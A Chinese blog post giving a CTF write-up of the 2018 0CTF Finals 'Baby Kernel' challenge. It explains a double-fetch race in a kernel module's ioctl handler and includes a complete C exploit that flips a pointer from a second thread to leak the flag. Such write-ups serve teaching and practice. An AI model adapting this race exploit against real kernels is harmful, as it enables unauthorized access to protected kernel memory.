2018 0CTF Finals Baby Kernel

最新推荐文章于 2024-07-04 15:04:45 发布
最新推荐文章于 2024-07-04 15:04:45 发布
阅读量305 收藏
点赞数
分类专栏: kernel pwn 文章标签: pwn 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/124166932
版权

学kernel的第三天,仍然很不想学

拿到题目先看看启动项

#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
echo "flag{this_is_a_sample_flag}" > flag
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod baby.ko
chmod 777 /dev/baby
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0  -f

可以看到我们要分析的文件应该是baby.ko

将它拖进IDA:
首先看看fop
在这里插入图片描述

可以看到只实现了一个baby_ioctl比较有用:
在这里插入图片描述

当command为0x6666时,将打印flag的地址,当command为0x1337时,会进行三个检查,然后对比用户输入数据和硬编码的flag是否相同,相同则输出flag

三个检查中current_task+0x1358比较难理解,动态调试一下能够看到它其实是0x7ffffffffffff000,a3是一个结构体,大致为:

struct flag
{
	char*flag_ptr
	int flag_len
}

所以三个检查分别为

  • flag结构体指针是否在用户态
  • flag_ptr指针是否在用户态
  • flag_len是否和硬编码的flag长度相同

这个题目考察的是double fetch的漏洞:
在这里插入图片描述

当内核想要取用用户态数据的时候,第一次取用数据进行安全检查(如缓冲区大小、指针可用性等),第二次才是真正的使用。这中间就有一个时间差,如果通过线程竞争,在第一次检测通过之后,通过其他线程篡改数据,就可以让内核使用篡改后的数据,而这个题,显然就是去碰撞一个时间点,即通过了_chk_range_not_ok的检测,且还没有开始把用户态数据和硬编码flag进行比较之前成功篡改数据,就可以将真正的flag打印出来。

exp:

#include <string.h>
char *strstr(const char *haystack, const char *needle);
#define _GNU_SOURCE         /* See feature_test_macros(7) */
#include <string.h>
char *strcasestr(const char *haystack, const char *needle);
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <pthread.h>

#define TRYTIME 0x1000
#define LEN 0x1000

struct attr
{
    char *flag;
    size_t len;
};
unsigned long long addr;
int finish =0;
char buf[LEN+1]={0};
void change_attr_value(void *s){
    struct attr * s1 = s; 
    while(finish==0){
    s1->flag = addr;
    }
}

int main(void)
{
 

    int addr_fd;
    char *idx;

    int fd = open("/dev/baby",0);
    int ret = ioctl(fd,0x6666);    
    pthread_t t1;
    struct attr t;

    setvbuf(stdin,0,2,0);
    setvbuf(stdout,0,2,0);
    setvbuf(stderr,0,2,0);   

    system("dmesg > /tmp/record.txt");
    addr_fd = open("/tmp/record.txt",O_RDONLY);
    lseek(addr_fd,-LEN,SEEK_END);
    read(addr_fd,buf,LEN);
    close(addr_fd);
    idx = strstr(buf,"Your flag is at ");
    if (idx == 0){
        printf("[-]Not found addr");
        exit(-1);
    }
    else{
        idx+=16;
        addr = strtoull(idx,idx+16,16);
        printf("[+]flag addr: %p\n",addr);
    }

    t.len = 33;
    t.flag = buf;
    pthread_create(&t1, NULL, change_attr_value,&t);
    for(int i=0;i<TRYTIME;i++){
        ret = ioctl(fd, 0x1337, &t);
        t.flag = buf;
    }
    finish = 1;
    pthread_join(t1, NULL);
    close(fd);
    puts("[+]result is :");
    system("dmesg | grep flag");
    return 0;
}

在这里插入图片描述

Ayakaaaa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf2018-babystack_writeup
CabbageWind的博客
08-17 862
题目:0ctf2018-babystack 检查保护机制: 可以看到程序只提供了NX保护。 在IDA中进行反编译,发现一个可读的位置,存在栈溢出漏洞,可能可以利用: 使用peda计算read位置的偏移: 得到read位置距离返回地址的偏移为44,比read的长度0x40小,说明栈溢出漏洞可直接被利用。 查看文件ELF表 通过elf表中查看得知程序中不存在system函数,无法直接跳转;也不存在输出函数,无法打印got表地址。 查看vmmap 通过vmmap可以看到bss段可
2018南宁ctf RE题目
12-18
2018年4道南宁CTF RE题目,有Windows逆向也有linux逆向
linux_kernal_pwn 2018 0CTF Finals Baby Kernel
yongbaoii的博客
09-01 242
看看保护,似乎没啥保护。 其实看到它不是单核单线程,猜测可能会有条件竞争。 挂载文件时baby.ko 来看程序 __int64 __fastcall sub_25(__int64 a1, int a2, __int64 a3) { __int64 result; // rax int i; // [rsp+1Ch] [rbp-54h] if ( a2 == 26214 ) { printk("Your flag is at %px! But I don't think you kn
First Kernel-pwn
aoque9909的博客
10-23 223
Kernel pwn-极简题目的操作模式 完全参照M4x师傅的指导,用 hacklu的baby kernel迈了第一步 题目附带文件说明 一般题目会给出bzImage,.cpio, .sh文件 sh文件适用于启动kernel的shell脚本文件,参数决定了内核的保护情况。 .cpio文件为文件系统映像。将其解压可以获得服务器交互程序的客户端 bzIma...
Linux kernel Exploit 内核漏洞学习(1)-Double Fetch
热门推荐
钞sir的博客
07-25 1万+
简介 Double Fetch从漏洞原理上讲是属于条件竞争漏洞,是一种内核态与用户态之间的数据存在着访问竞争;而条件竞争漏洞我们都比较清楚,简单的来说就是多线程数据访问时,并且没有对数据做必要的安全同步措施;当多线程时,对于同一数据有一个线程在读而有另外一个线程在写,这就可能引起数据的访问异常,而此时如果这个异常访问情况发生在内核与用户线程之间时,就触发double fetch漏洞了… 为了简化漏......
linux oj内核,linux 内核 pwn入门
weixin_36183642的博客
04-30 392
linux 内核 pwn入门最近把缺掉的知识一点一点补,面先补全了,然后在进行一方面的深入,涉及了下linux 内核 pwn部分的学习,本来想编写结构体大小生成的代码的,奈何储备知识不够,普通方法太麻烦,现在略过,到时候学会了在补上找cred结构体大小读源码这种方法可以找到,太费力了kuid跟kgid大小为/include/uapi/asm-generic/posix_types.h可以找到123...
CTF baby_web
艺博东的博客
09-25 8480
题目描述:想想初始页面是哪个 题目场景: http://220.249.52.133:49388 1、点击链接进入一下界面 2、URL:把“1.php”为“index.php”—>回车 3、查看源代码(按F12或Fn+F12) 4、点中“Network”—>点击“index.php” 5、Response Headers—>FLAG: flag{very_baby_web} 6、OK flag{very_baby_web} ...
[ CTF ] Reverse baby_re
ZXW_NUDT的博客
07-14 901
CTF
小白从0学习ctf(web安全
zyh1588的博客
03-30 1480
小白从0学习ctf(web安全-文件包含漏洞1)
h1-702-2018-ctf-wu
05-09
【标题】"h1-702-2018-ctf-wu"是一个针对HackerOne平台的H1-702 CTF比赛的挑战项目,它以Android应用程序的形式呈现。这个CTF(Capture The Flag)比赛是网络安全领域的实战演练,参赛者通过解决一系列安全问题来...
0ctf_tctf_2018
05-16
0 CTF / TCTF 2018 0CTF / TCTF 2018决赛中的一些加密挑战
2018上海CTF“骇极杯”逆向WP
11-12
2018上海CTF“骇极杯”逆向WP2018上海CTF“骇极杯”逆向WP
CTF真题-Dest0g3CTF2022招新赛
06-01
CTF真题-Dest0g3CTF2022招新赛,来自BUUCTF。
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 295
亚信安全发布2024年6月威胁态势
网络安全&密码学—python中的各种加密算法
xt350488的博客
07-02 1079
数据加密是一种保护数据安全的技术,通过将数据(明文)转换为不易被未经授权的人理解的形式(密文),以防止数据泄露、篡改或滥用。加密后的数据(密文)可以通过解密过程恢复成原始数据(明文)。数据加密的核心是密码学,它是研究密码系统或通信安全的一门学科,包括密码编码学和密码分析学。在网络安全和密码学领域,数据加密是保护数据机密性、完整性和可用性的关键技术。Python作为一种功能强大的编程语言,提供了多种实现数据加密和解密的方法。
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 870
然后这一步,你看,这里有个决策点
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 361
IDF版本:4.4.7。
WebKit中的安全新纪元:Web Authentication API深度解析
2401_85763639的博客
07-03 714
Web Authentication API是一种新兴的Web标准,旨在使用公钥密码学提供更安全的登录和多因素认证方法。与传统的用户名和密码认证方式相比,WebAuthn提供了一种无密码的认证机制,从而减少了密码泄露和钓鱼攻击的风险。
【前端】技巧 js 监听所有A标签 拦截 用于安全跳转等
最新发布
我是Superman丶的博客
07-04 227
【前端】技巧 监听所有A标签 拦截 用于安全跳转等。
[SWPUCTF 2018]SimplePHP
07-28
回答: \[1\]中的代码片段是一个PHP代码示例,其中定义了三个类C1e4r、Show和Test,并创建了相应的对象。\[2\]中的代码片段是一个PHP文件,它包含了一些文件操作和类的实例化。\[3\]中的代码片段是一个POC(Proof of Concept)示例,用于演示一个可能的漏洞利用场景。根据提供的信息,这个问题可能是关于SWPUCTF 2018比赛中的一个题目,题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* [[SWPUCTF 2018]SimplePHP_wp](https://blog.csdn.net/lzu_lfl/article/details/127802053)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[SWPUCTF 2018]SimplePHP](https://blog.csdn.net/shinygod/article/details/124002143)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目](https://blog.csdn.net/qq_41401434/article/details/125323752)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值